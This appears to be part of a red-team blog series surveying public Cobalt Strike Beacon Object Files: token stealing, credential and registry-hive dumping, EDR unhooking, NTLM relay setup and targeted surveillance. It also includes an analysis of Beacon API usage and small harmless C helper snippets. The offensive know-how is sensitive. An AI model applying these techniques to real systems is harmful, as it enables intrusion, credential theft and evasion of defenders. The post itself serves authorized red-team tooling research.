GhostPack/Koh

Koh is a token stealing tool implemented using a server/client architecture. The server, written in C#, is injected into a high-privileged process, such as one running with SYSTEM permissions, where it can continuously monitor and capture user tokens and logon sessions. By operating independently of the C2 infrastructure, the server persists in the target environment, enabling long-term operation without relying on constant communication with the attacker’s framework. The client, on the other hand, is implemented as a BOF. It is designed to allow users to send commands to the server, retrieve and use captured tokens for impersonation and configure its behavior as needed. This server/client architecture avoids the limitations of BOFs, which are inherently ephemeral and tied to the lifecycle of the C2 beacon, meaning that they should not be used for long-running tasks.

mertdas/PrivKit

PrivKit is a set of BOFs designed to identify privilege escalation vulnerabilities resulting from misconfigurations in Windows operating systems, thus supporting the work during the reconnaissance phase. The following misconfiguration types can be detected:

  • Unquoted service paths
  • Autologin registry key set
  • “Always Install Elevated” registry key set
  • Modifiable autorun folders
  • Existence of known hijackable paths
  • Possible enumeration of credentials from credential manager
  • Misconfigured token privileges

Although the description in the repository says that PrivKit is a single BOF, it actually consists of seven individual smaller BOFs that are bundled into one Cobalt Strike command with the help of Aggressor Script.
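To make the first check in the list above more concrete, the following is a minimal sketch of how an unquoted service path could be recognized from a service's image path string. It is not PrivKit's implementation. The function name `is_unquoted_service_path` is hypothetical, and the sketch assumes that the executable portion ends at the first `.exe` in the string, which is a simplification.

```c
#include <assert.h>
#include <ctype.h>
#include <stdbool.h>
#include <string.h>

/* Returns a pointer to the first ".exe" (case-insensitive) or NULL. */
static const char *find_exe_suffix(const char *s)
{
    for (; *s != '\0'; s++) {
        if (s[0] == '.' &&
            tolower((unsigned char)s[1]) == 'e' &&
            tolower((unsigned char)s[2]) == 'x' &&
            tolower((unsigned char)s[3]) == 'e') {
            return s;
        }
    }
    return NULL;
}

/* Hypothetical helper: true if the image path is not quoted and contains a
 * space inside the executable portion. Spaces that only separate the
 * executable from its arguments are ignored. */
bool is_unquoted_service_path(const char *image_path)
{
    assert(image_path != NULL);

    /* Skip leading spaces before the path. */
    while (*image_path == ' ') {
        image_path++;
    }

    /* A path that starts with a quote is treated as safe in this sketch. */
    if (*image_path == '"') {
        return false;
    }

    /* Assumption: the executable ends at the first ".exe"; if there is
     * none, the whole string is treated as the path. */
    const char *exe = find_exe_suffix(image_path);
    const char *end = (exe != NULL) ? exe + 4 : image_path + strlen(image_path);

    for (const char *p = image_path; p < end; p++) {
        if (*p == ' ') {
            return true;
        }
    }
    return false;
}
```

A real check would additionally have to enumerate the installed services and verify that one of the intermediate directories is writable for the current user. Both steps are left out here.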

CodeXTF2/ScreenshotBOF

ScreenshotBOF is a utility to capture screenshots from within a Cobalt Strike beacon using non-malicious Windows APIs. The screenshots can be saved on disk on the target’s computer or kept in memory for transmission over the C2 channel.

wavvs/nanorobeus

Nanorobeus is a post-exploitation BOF that facilitates privilege escalation, credential dumping and lateral movement within a compromised Windows environment. It does virtually the same as the popular tool “Rubeus”, but as a BOF: it automates the extraction of information, such as credentials, tokens and service accounts, by utilizing Windows API calls and manipulating native OS processes. Additionally, it supports common attack techniques like Kerberoasting, pass-the-hash and pass-the-ticket to bypass authentication mechanisms and move laterally between machines.

zyn3rgy/smbtakeover

The smbtakeover repository provides techniques to unbind and rebind TCP port 445 on Windows systems without the need to load drivers, inject modules into LSASS or reboot the target machine. This approach facilitates SMB-based NTLM relay attacks during C2 operations. The repository includes PoC implementations both in Python and as a BOF, utilizing RPC over TCP for remote machine targeting.

CodeXTF2/WindowSpy

WindowSpy is a BOF designed for targeted user surveillance. Its primary objective is to activate surveillance capabilities only for specific scenarios, such as browser login pages, sensitive documents or VPN login screens. This approach enhances stealth by reducing the risk of detection associated with repeated surveillance activities, like taking frequent screenshots. Additionally, it streamlines operations for red teams by minimizing the volume of surveillance data, saving time that would otherwise be spent analyzing extensive logs generated by constant keylogging or screen monitoring.
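The trigger idea can be sketched as a simple keyword match. The example assumes that a scenario is recognized by comparing the title of the active window against a list of trigger words. The function names and the keyword list are hypothetical and are not taken from the WindowSpy source.

```c
#include <assert.h>
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>

/* Case-insensitive substring search over ASCII strings. */
static bool contains_ignore_case(const char *haystack, const char *needle)
{
    if (*needle == '\0') {
        return true;
    }
    for (; *haystack != '\0'; haystack++) {
        size_t i = 0;
        while (needle[i] != '\0' && haystack[i] != '\0' &&
               tolower((unsigned char)haystack[i]) ==
               tolower((unsigned char)needle[i])) {
            i++;
        }
        if (needle[i] == '\0') {
            return true;
        }
    }
    return false;
}

/* Hypothetical helper: true if the window title contains any trigger word.
 * Only then would the more expensive surveillance step (for example, a
 * screenshot) be started. */
bool title_is_interesting(const char *title,
                          const char *const *keywords, size_t count)
{
    assert(title != NULL && keywords != NULL);

    for (size_t i = 0; i < count; i++) {
        if (contains_ignore_case(title, keywords[i])) {
            return true;
        }
    }
    return false;
}
```

With the illustrative keywords `login`, `vpn` and `password`, a window titled “Corporate VPN - Sign in” would trigger, while “Untitled - Notepad” would not.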

rsmudge/unhook-bof

Unhook-BOF is a simple BOF that removes API hooks from the beacon process. API hooking is often used by EDR software to monitor running processes. This allows certain malicious function calls or memory accesses to be detected and prevented at runtime. With Unhook-BOF, these externally set API hooks can be removed to make the process stealthier.

EncodeGroup/BOF-RegSave

BOF-RegSave is designed to facilitate privilege escalation and registry key extraction. It enables the beacon to acquire the necessary system privileges and retrieve the SAM, SYSTEM and SECURITY keys from the Windows registry. These keys can then be analyzed offline to extract password hashes and other sensitive data, aiding in post-exploitation activities. By targeting these critical registry keys, the BOF provides a streamlined and efficient method for gathering credentials and escalating access during red team operations. The results are stored on disk and must be manually extracted afterwards.

boku7/whereami

Whereami is a BOF that extracts information about the running beacon in an OPSEC-safe way. It does this by using handwritten shellcode to return the process environment strings without accessing any DLLs. The shellcode extracts the same information returned by whoami.exe (along with other environment values) from the beacon process’s memory. A similar BOF exists within the CS-Situational-Awareness-BOF collection and can be used to acquire the same information.

connormcgarr/tgtdelegation

Tgtdelegation is a BOF to obtain a usable Kerberos Ticket Granting Ticket (TGT) for the current user using the well-known “TGT delegation trick”. A Service Principal Name (SPN) can also be specified if the default SPN is not configured for unconstrained delegation. The process extracts the TGT from Windows API calls and prepares it for the specified target, which must support unconstrained delegation. This approach simplifies obtaining and leveraging Kerberos tickets for red team operations.

ASkyeye/Cobalt-Clip

Cobalt-Clip is a BOF that enables interaction with a target’s clipboard during post-exploitation activities. It allows for dumping and setting the clipboard’s current contents. With the clipmon command, it also offers an option to monitor the clipboard for changes, providing details such as the updated content, the active window at the time of the change and the timestamp. This command operates as a reflective DLL instead of within a BOF – correctly adhering to the intended design of BOFs not being used for long-running tasks – and is initiated as a job using the bdllspawn function within the Aggressor Script.

Assessing Beacon API and Aggressor Script Usage

To determine how the Beacon APIs are used, we relied on the GitHub Search API, which is well suited to finding function calls. We searched explicitly for the function names of the Beacon APIs and found the following:

  • All but two BOFs use the Data Parser API (the other two are not parameterized)
  • Only 3 of 15 BOFs use the Format API directly
  • All BOFs except one use the Output API, which means they are directly dependent on the Format API as well
  • One BOF uses the Token API
  • One BOF uses the Spawn+Inject API
  • One BOF uses the Key/Value Store API
  • The remaining APIs were completely unused

All the BOFs mentioned come with an Aggressor Script file. Some BOFs depend on it and cannot be run standalone. However, this does not apply to all of them: The CS-Situational-Awareness-BOF and CS-Remote-OPs-BOF collections are designed for standalone execution, which means that a large number of smaller tasks can already be performed without it.

DFR is used by almost all of the BOFs. Two other BOFs resolve the functions themselves using LoadLibraryA and GetProcAddress (maybe the authors did not know DFR existed?). Approximately half of the BOFs that use DFR also use TrustedSec’s bofdefs.h.
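With DFR, a BOF references an external function through a symbol of the form `LIBRARY$Function`, which the loader has to take apart before it can resolve the address. The following is a minimal sketch of that splitting step, not the code of any particular loader. The function name `split_dfr_symbol` is hypothetical, and the sketch assumes x64 object files, where the import symbol carries the prefix `__imp_` and no further name decoration.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: splits "__imp_KERNEL32$GetCurrentProcessId" into
 * "KERNEL32" and "GetCurrentProcessId". Returns false if the symbol has
 * no '$' separator or if an output buffer is too small.
 * Assumption: x64 symbols only; x86 name decoration is not handled. */
bool split_dfr_symbol(const char *symbol,
                      char *library, size_t library_size,
                      char *function, size_t function_size)
{
    assert(symbol != NULL && library != NULL && function != NULL);

    /* Strip the import prefix if it is present. */
    static const char prefix[] = "__imp_";
    if (strncmp(symbol, prefix, sizeof prefix - 1) == 0) {
        symbol += sizeof prefix - 1;
    }

    /* Both sides of the '$' separator must be non-empty. */
    const char *sep = strchr(symbol, '$');
    if (sep == NULL || sep == symbol || sep[1] == '\0') {
        return false;
    }

    size_t lib_len = (size_t)(sep - symbol);
    size_t fn_len = strlen(sep + 1);
    if (lib_len >= library_size || fn_len >= function_size) {
        return false;
    }

    memcpy(library, symbol, lib_len);
    library[lib_len] = '\0';
    memcpy(function, sep + 1, fn_len + 1); /* copies the terminator too */
    return true;
}
```

On Windows, a loader could then pass the two parts to LoadLibraryA and GetProcAddress, which is the same pair of calls that the two BOFs without DFR invoke by hand. Symbols without a `$`, for which the helper returns false, would have to be handled separately.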

More complex BOFs such as the token stealing toolkit Koh are much more difficult to separate from Aggressor Script, mainly due to their non-standard client/server architecture. Some of the BOFs are only executed as a “reaction” to an Aggressor Script event, such as WindowSpy, which is executed at certain intervals, like on beacon check-ins. Such approaches are difficult to transfer to Mythic as they are, but the techniques used can be easily rewritten to work without the Aggressor Script dependency with some time investment. However, this list of BOFs clearly demonstrates how powerful they can be.

Conclusion

In this second part of the blog post series, we looked at various public BOF implementations. Hopefully, it showed how versatile and powerful they can be and why they are indispensable for us too.

In the next part of this blog post series, we will dive into more technical details. We will show how we have implemented our own BOF loader in order to facilitate execution of several of the BOFs shown in this part.
